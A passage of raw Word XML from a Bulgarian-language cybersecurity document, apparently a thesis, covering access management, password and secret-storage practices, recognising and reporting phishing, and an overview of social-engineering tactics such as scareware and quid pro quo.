        <w:t xml:space="preserve">Identity and Access Management (IAM) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">системи, за да могат администраторите </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t>да</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve">наблюдават и менажират </w:t>
      </w:r>
      <w:r>
        <w:t>роли,</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve"> да следят </w:t>
      </w:r>
      <w:r>
        <w:t>достъп</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до мрежи на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on-premise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> базирани апликации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ADBF51" w14:textId="6494E063" w:rsidR="00C90B23" w:rsidRDefault="00C90B23" w:rsidP="002579CD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Подмяна на </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve">административните </w:t>
      </w:r>
      <w:r>
        <w:t>пароли</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve"> преди продукта да е пуснат на пазара</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t>При</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разработка</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t>та на</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дадена услуга/апликация, програмистите използват пароли, които са известни на целия екип, за да си улеснят работния процес. Това е приемливо, когато продуктът не е </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>деплойнат</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и само се тестват функционалностите</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve"> му</w:t>
      </w:r>
      <w:r>
        <w:t>. Ако тези пароли останат в</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve"> кода</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, тогава хакерът има </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (фиг. </w:t>
      </w:r>
      <w:r w:rsidR="00685A9E">
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00677E04">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C6B12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C6B12" w:rsidRPr="002C6B12">
        <w:t>Същото важи и за „</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C6B12" w:rsidRPr="002C6B12">
        <w:t>umask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C6B12" w:rsidRPr="002C6B12">
        <w:t xml:space="preserve"> 000", при който новосъздадените файлове и директории получават максимални права за четене, писане и изпълнение от всички потребители.</w:t>
      </w:r>
      <w:r w:rsidR="00677E04">
        <w:t xml:space="preserve"> А</w:t>
      </w:r>
      <w:r>
        <w:t>каунти с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> root access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> които се използват за ежедневни задачи</w:t>
      </w:r>
      <w:r w:rsidR="00677E04">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00677E04">
        <w:t>също попадат в тази категория</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676BF776" w14:textId="63BB46F9" w:rsidR="00C90B23" w:rsidRPr="004B30C0" w:rsidRDefault="00C90B23" w:rsidP="002579CD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Независимо дали става въпрос за лични акаунти или фирмени, необходимо е една парола да бъде поне 15 символа. Използването на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Password managers e </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">препоръчително, ако потребителят има проблем с запомнянето на паролите. Не трябва пароли да се съхраняват в текстови файлове в </w:t>
      </w:r>
      <w:r w:rsidR="003049E8">
        <w:t xml:space="preserve">устройствата. </w:t>
      </w:r>
      <w:r w:rsidR="004B30C0">
        <w:t>Не е добре паролите да се съхраняват в браузера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA6400" w14:textId="77777777" w:rsidR="00CD6DAA" w:rsidRDefault="003049E8" w:rsidP="002579CD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Имплементация на заключване на акаунти при множество неуспешни опити. Логване и мониторинг на опитите за </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>логин</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> е необходимо за разпознаване на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>brute force</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741470FE" w14:textId="4EFB7C2A" w:rsidR="003049E8" w:rsidRPr="00CD6DAA" w:rsidRDefault="00CD6DAA" w:rsidP="00CD6DAA">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Токени и други</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> private keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> трябва да се помещават в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vaults.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Задължително е използването на силно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>хаширащи</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> алгоритми. Едно такова решение е имплементацията на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HashiCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vault. Vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е система за чувствителна информация – пароли, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ключове, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>токени</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ключове, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сертификати и др. Решава проблема на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hardcoded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пароли, споделени пароли, частни ключове в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>гит</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и ръчна ротация. Данните в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> са криптирани, има контрол до достъпа и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">audit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>логове</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Поддържа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDAP, OIDC, IAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и много други. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1352567070"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="5F14A3EC" w14:textId="77777777" w:rsidR="002579CD" w:rsidRPr="002579CD" w:rsidRDefault="00C90B23" w:rsidP="00677E04">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2539453B" wp14:editId="5C747EF4">
            <wp:extent cx="4476997" cy="1608798"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47006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62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8517" cy="162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0FF8" w14:textId="1AF0284A" w:rsidR="007B6A32" w:rsidRDefault="00A05FA6" w:rsidP="00A05FA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc223382617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26</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6E16">
        <w:t xml:space="preserve">Диаграма </w:t>
      </w:r>
      <w:r w:rsidR="003756A3">
        <w:t>показваща защо използването</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6E16">
        <w:t xml:space="preserve"> на пароли по подразбиране не е препоръчително.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="01825AE3" w14:textId="77777777" w:rsidR="003776F1" w:rsidRPr="003776F1" w:rsidRDefault="007B6A32" w:rsidP="007B6A32">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="31" w:name="_Toc224154946"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phishing </w:t>
      </w:r>
      <w:r>
        <w:t>атаки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="3DED5F47" w14:textId="73891A5D" w:rsidR="003776F1" w:rsidRDefault="007B6A32" w:rsidP="00494EB0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003776F1">
        <w:tab/>
        <w:t xml:space="preserve">Потребителят трябва да бъде много внимателен към какви платформи, уеб сайтове, форуми използва своя имейл адрес. </w:t>
      </w:r>
      <w:r w:rsidR="00494EB0">
        <w:t>Това е и най-лесният начин да стане обект на фишинг атака. Почти всички фишинг имейла носят чувство на тревожност, карат потребителя незабавно да предприеме някакви действия</w:t>
      </w:r>
      <w:r w:rsidR="00A129D7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00494EB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A129D7">
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidR="00494EB0">
        <w:t xml:space="preserve"> противен случай, ще се случи Х събитие. Има няколко основни стъпки, по които може да се разпознае дали даден имейл е фишинг или не:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335DD3A5" w14:textId="446B2063" w:rsidR="00494EB0" w:rsidRDefault="00494EB0" w:rsidP="00494EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Чувство на тревожност</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED83A3" w14:textId="4F8D272B" w:rsidR="00494EB0" w:rsidRDefault="00494EB0" w:rsidP="00494EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Липсва обръщение към </w:t>
      </w:r>
      <w:r w:rsidR="00795EDA">
        <w:t>получателя</w:t>
      </w:r>
      <w:r w:rsidRPr="00494EB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>– това не винаги е приложимо, ако потребителят е таргетиран може да припознае и лична информация свързано с него.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C3E262" w14:textId="5D2DF32C" w:rsidR="00494EB0" w:rsidRDefault="00494EB0" w:rsidP="00494EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>За първи път потребителят получава имейл от даден</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> user – </w:t>
      </w:r>
      <w:r>
        <w:t>задължителна проверка на имейл адреса. Някои имейли имитират тези на големи организации, но има минимална и леко забележима разлика в адреса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B9A59C" w14:textId="1DE36978" w:rsidR="00494EB0" w:rsidRPr="009B080A" w:rsidRDefault="00494EB0" w:rsidP="00494EB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ако идва към служебен имейл – тогава да се провери дали е </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">internal </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>external</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3FA80A" w14:textId="5787E021" w:rsidR="009B080A" w:rsidRPr="009B080A" w:rsidRDefault="009B080A" w:rsidP="009B080A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При каквото и да е съмнение за фишинг имейл е важно потребителят да го </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>репортне</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> за фишинг (фиг. </w:t>
      </w:r>
      <w:r w:rsidR="0090789B">
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Обикновено потребителят получава обратна връзка дали са предприети действия.</w:t>
      </w:r>
      <w:r w:rsidR="001A4310">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1105840719"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:instrText xml:space="preserve"> CITATION Spe \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1520311957"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:instrText xml:space="preserve"> CITATION Car \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[14]</w:t>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="17D26B8E" w14:textId="73CBD443" w:rsidR="009B080A" w:rsidRDefault="007C209D" w:rsidP="009B080A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007C209D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9AF690" wp14:editId="3C264A59">
            <wp:extent cx="2419350" cy="3219412"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="203139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900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2124" cy="322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6477" w14:textId="207C9664" w:rsidR="009B080A" w:rsidRPr="00A05FA6" w:rsidRDefault="00A05FA6" w:rsidP="00A05FA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc223382618"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006D4D8B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C224B">
        <w:t xml:space="preserve">Показва как се </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C224B">
        <w:t>репортва</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C224B">
        <w:t xml:space="preserve"> фишинг имейл в Outlook.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="613845F5" w14:textId="77777777" w:rsidR="005F2CAA" w:rsidRDefault="00FF2690" w:rsidP="005F2CAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc224154947"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Други форми на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Social Engineering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="43B67C8D" w14:textId="77777777" w:rsidR="005F2CAA" w:rsidRDefault="005F2CAA" w:rsidP="00C06BE8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Social Engineering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е тактика използваща манипулация, насърчаване или измама целяща заблуждаване на жертва с цел придобиване на правомощия върху частна система</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>кражба на лична и/или финансова информация. Разчита на психологическа манипулация, за да надхитри потребителите да направят грешки или доброволно да дадат повелителна информация.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E875737" w14:textId="77777777" w:rsidR="003C2126" w:rsidRDefault="003C2126" w:rsidP="00C06BE8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">По-горе бяха разгледани типични </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаки, но те не представляват единствената форма на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>social engineering.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Съществуват и други техники, които могат да бъдат използвани като начална точка при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DFE0AC" w14:textId="77777777" w:rsidR="003C2126" w:rsidRDefault="003C2126" w:rsidP="00C06BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="003C2126">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scareware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> представлява атака, при която жертвата е тероризирана от фалшиви заплахи и несъществуващи заплахи. Потребителят е залъгван, че системата му е хакната и незабавно трябва да му бъде оказа помощ като се включват в неговото устройство чрез отдалечен достъп </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(remote access). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Хакерът може да се представи като част от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> екип.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A2918" w14:textId="17569DDA" w:rsidR="003C2126" w:rsidRDefault="003C2126" w:rsidP="00C06BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dumpster Diving</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> представлява атака, при която мошеника е претърсил интернет за информация свързана с жертвата -</w:t>
      </w:r>
      <w:r w:rsidR="00D86FD0">
        <w:t xml:space="preserve"> банкова информация, студентска информация, социални мрежи – особено </w:t>
      </w:r>
      <w:r w:rsidR="00D86FD0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LinkedIn</w:t>
      </w:r>
      <w:r w:rsidR="00D86FD0">
        <w:t xml:space="preserve">, където се съдържа информация за това къде живее </w:t>
      </w:r>
      <w:r w:rsidR="001F7A8E">
        <w:t>потърпевшият</w:t>
      </w:r>
      <w:r w:rsidR="00D86FD0">
        <w:t>, позицията, която заема, какво и къде е учил.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A57486" w14:textId="6AD68E3D" w:rsidR="00107E62" w:rsidRDefault="00D86FD0" w:rsidP="00C06BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Quid Pro Quo: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Нападателят предлага услуги или помощ в замяна на чувствителна информация.  Жертвата получава телефонно обаждане от непознато лице, които се представя като </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IT </w:t>
      </w:r>
      <w:r>
        <w:t>специалист и предлага техническа помощ</w:t>
      </w:r>
      <w:r w:rsidR="00CC04B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CC04B6">
        <w:t xml:space="preserve">Също както </w:t>
      </w:r>
      <w:r w:rsidR="00CC04B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scareware,</w:t>
      </w:r>
      <w:r w:rsidR="00CC04B6">
        <w:t xml:space="preserve"> обикновено ще изискат от потърпевшия да инсталира скрипт или да му се предостави достъп до системата.</w:t>
      </w:r>
      <w:r w:rsidR="00C06BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="674697900"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION Car \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
